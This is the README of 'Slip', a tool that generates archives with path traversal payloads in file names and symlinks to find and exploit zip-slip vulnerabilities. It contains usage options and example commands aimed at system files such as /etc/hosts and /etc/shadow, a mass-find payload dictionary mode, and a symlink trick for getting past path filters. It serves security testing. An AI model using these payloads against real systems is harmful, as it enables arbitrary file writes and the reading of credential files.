Slip is a malicious archive generator to exploit path traversal vulnerabilities.
Slip makes it easy to create multiple archives containing path traversal payloads in file name fields, rendering the extraction of the archive a potentially dangerous operation. With this approach it is possible to find and exploit "zip-slip" type vulnerabilities.
Most commonly used tools rarely support path traversal payloads in archives, this makes it hard and time consuming to create malicious archives when attempting to find vulnerabilities in a software. With slip it's really convenient to create higly customizable archives that fit most situations.
Slip is a feature rich script capable of satisfying most "zip-slip" hunting needs, in particular the script:
- Supports zip, tar, 7z, jar, war, apk and ipa archives (and every compression algorithm supported by each format)
- Allows to hunt for both arbitrary file write and arbitrary file read vulnerabilities (using paths or symlinks)
- Supports multiple payloads of different types (paths/symlinks)
- Supports the automatic generation of path traversal payloads to look for a file at different "depths"
- Supports the usage of custom "dotdotslash" sequences
- Implements a "massfind" mode, that uses a payload dictionary to create the archive
Clone the repo, install the requirements (pip install -r requirements.txt) and you're good to go!
Usage: slip.py [OPTIONS] ARCHIVE_NAME
Script to generate "zipslip" and "zip symlink" archives.
ARCHIVE-NAME is the name of the archive to be created.
Options:
-a, --archive-type [zip|tar|7z|jar|war|apk|ipa]
Type of the archive. [default: zip]
-c, --compression [none|deflate|bzip2|lzma|lzma2|ppmd|brotli|zstandard|copy]
Compression algorithm to use in the archive.
-p, --paths TEXT Comma separated paths to include in the
archive.
-s, --symlinks TEXT Comma separated symlinks to include in the
archive. To name a symlink use the syntax:
path;name
--file-content TEXT Content of the files in the archive,
mandatory if paths are used.
--force-name If set, the filename will be forced exactly
as provided.
--search INTEGER If set, paths and symlink will generate
multiple traversal paths to try and find the
target file or path at different depths.
[default: 0]
--dotdotslash TEXT Dot dot slash sequence to use in search
mode. [default: ../]
--mass-find TEXT Name of the file to find. It will create an
archive with numerous path traversal
payloads aimed to find the specified file
name. WARNING: it uses A LOT of payloads,
use with caution.
--mass-find-mode [paths|symlinks]
Mass-find mode to use [default: symlinks]
--mass-find-dict FILENAME Mass-find payload dictionary [default:
path_traversal_dict.txt]
--mass-find-placeholder TEXT Mass-find placeholder for filename in
dictionary [default: {FILE}]
-v, --verbose Verbosity trigger.
--help Show this message and exit.
Create a tar.bz2 archive containing 2 explicit paths:
python3 slip.py --archive-type tar --compression bzip2 --paths "../etc/hosts, ../../etc/hosts" --file-content "foo" archive
Create a zip archive containing an explicit path and an explicit symlink:
python3 slip.py --archive-type zip --compression deflate --paths "../etc/hosts" --symlinks "../etc/shadows" --file-content "foo" archive
Create a tar.bz2 archive with 4 payloads to search for "config.ini" at 3 different depths (it also uses Windows flavor dot dot slash):
python3 slip.py --archive-type tar --compression bzip2 --paths "config.ini" --search 3 --dotdotslash "..\\" --file-content "foo" archive
The archive will contain:
config.ini
..\config.ini
..\..\config.ini
..\..\..\config.ini
Create a 7z archive with a named symlink:
python3 slip.py --archive-type zip --symlinks "../etc/hosts;linkname" archive
This technique is really useful in case directory traversal payloads are filtered in paths but not in symlink, as it would be possible to achieve an arbitrary write file referring to the named symlink as parth of the path (e.g. symlink: ../etc/;foo, path: foo/hosts).
Create a tar archive with multiple payloads (from the default mass-find dictionary) to find the /etc/host/ file:
python3 slip.py --archive-type tar --mass-find "/etc/hosts" --mass-find-mode symlinks archive
-
Depending on the library that handles the decompression, results may vary greatly.
Different compression algorithms can trigger different behaviours during the extraction, but also the usage of certain path traversal payloads in names or the co-presence of path traversal payloads in names and symlink can lead to weird behaviours during the extraction. Many combinations of compression algorithms, archive types and payloads are relatively untested and should be evaluated on a case by case basis to obtain the best results.
-
Archive types: jar|war|apk|ipa are supported as simple zip archives.
The archive format is correct, but valid archives should contain compatible contents. Valid contents can be set manually and are not yet supported by slip. Please note that many software that handles these formats, treat them as zip files. This means that using the correct extension will suffice.
This project is licensed under the GPL-3.0 License.